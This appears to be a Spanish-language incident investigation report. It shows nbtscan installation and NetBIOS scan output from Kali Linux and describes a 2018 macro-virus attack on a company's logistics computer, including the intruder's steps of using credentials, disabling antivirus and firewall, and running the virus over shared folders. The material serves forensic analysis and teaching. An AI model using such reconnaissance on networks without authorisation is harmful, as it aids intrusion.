192.168.1.4 PEPE 10:20:30:40:10:a2
nbtscan -v 192.168.1.0-6 ídem al anterior pero con la opción -v activa el modo de información ampliada.
# nbtscan -v 192.168.1.0-6
Doing NBT name scan for addresses from 192.168.1.0-6
192.168.1.0 Sendto failed: Permission denied
NetBIOS Name Table for Host 192.168.1.4:
Incomplete packet, 173 bytes long.
Name Service Type
----------------------------------------
PEPE <00> UNIQUE
YGAW <00> GROUP
PEPE <20> UNIQUE
YGAW <1e> GROUP
Adapter address: 10:20:30:40:10:a2
---------------------------------------
Uso de Herramienta NBTSCAN:
Ésta es una comando-línea herramienta que las exploraciones para los nameservers abiertos de NETBIOS en una red local o alejada del TCP/IP, y ésta son un primer paso en encontrar de partes abiertas. Se basa en la funcionalidad del nbtstat estándar de la herramienta de Windows, pero funciona encendido una gama de direcciones en vez de apenas una.
Instalación en KALI LINUX .- Ingresamos al Modo Root e intslamos.
1
2
sudo apt-get update
sudo apt-get install nbtscan
Ejecutamos el Comando nbtscan : root@kali:~# nbtscan
Ejecutamos el comando siguiente para verificar si existen en la Red algún enlace compartido de archivos con otro PC:
root@kali:~# nbtscan –r 192.168.100.79/24
Listo, podemos Observar en la captura de pantalla que la IP 192.168.100.131 (INTRUSO) está conectada por acceso remoto o carpetas compartidas a la IP 192.168.100.79 (VICTIMA ), e incluso nos muestra el nombre único MAC para detectar con mayor claridad donde está ubicada.
Exposición final de lo suscitado en la EMPRESA MARATHON SPORTS:
El miércoles 7 de Febrero del 2018 a las 17:30 el virus se alojó en el computador de Logística donde se encontraba la información necesaria de los Embarques próximos Arribar al CD.
Consecuencias del Virus Macro:
El Virus Macro afecto a los archivos antes mencionados ocasionando en el CD lo siguiente:
Los Jefes del CD no tenían el Informe General para analizar el espacio de recepción en el CD y autorizar la llegada de los Embarques.
El Área de Transferencias tuvo pérdida de tiempo en recursos, ya que el personal estaba esperando dicha información para proceder con el descargue, separación de categorías, líneas, colocación de precios/tickets, repartición del producto, transferencias a los Almacenes (guardado - conteo) y carga a los Camiones para su respectivo envió.
El Área de descarga no tenía los informes para cuadrar los Embarques y reportar los faltantes y sobrantes si existiesen.
El Área de logística buscaba alternativas para realizar nuevos informes en otras computadoras que no se encuentren infectadas del virus macro.
Los encargados que realizan tareas en el Área de Logística estaban conformados por las siguientes personas:
- Sr. Eddy: Logística e información de Embarques.
- Sr. Geovanny: Costeos de Embarques.
- Sr. Luis: Facturación de Embarques.
- Sr. Juan Carlos: Encargado de Área y revisión de procesos.
Revisando los procesos se identifica que el Sr. Eddy es la persona la encargada de la Logística e información de los Embarques que llegan al CD, el cual nos comenta que su equipo cumplía con las todas los normativas de seguridad y cualquier cambio en el sistema, actualización o instalación de software se solicita autorización del Encargado de Área ya que él tenía Clave de ADMINISTARADOR para realizar cualquier proceso, por tal motivo podemos asegurar que el daño fue causado por un INTRUSO.
MODO OPERANDI DEL INTRUSO Y LA INSTALACION DEL VIRUS MACRO
PC1: COMPUTADOR DE LOGISTICA E INFORMACION DEL CD:
-El atacante Ingresa al PC1 con nombre de Usuario y Contraseña para establecer una conexión y compartir las carpetas que van a ser infectadas.
-El atacante desactiva el ANTIVIRUS y el FIREWALL
PC2: COMPUTADOR DEL INTRUSO:
-El atacante en su PC2 ingresa a las Carpetas Compartidas y procede a copiar el VIRUS MACRO
INSTALACION DEL VIRUS POR PARTE DEL INTRUSO:
- Al realizar los pasos anteriores el atacante nuevamente ingresa al PC1 (Computador de Logística e Información) para ejecutar el VIRUS MACRO y proceder con el daño planificado.
Archivo de LOGISTICA
(Base de Datos)
Archivos de INFORMACION
(Información de Embarques)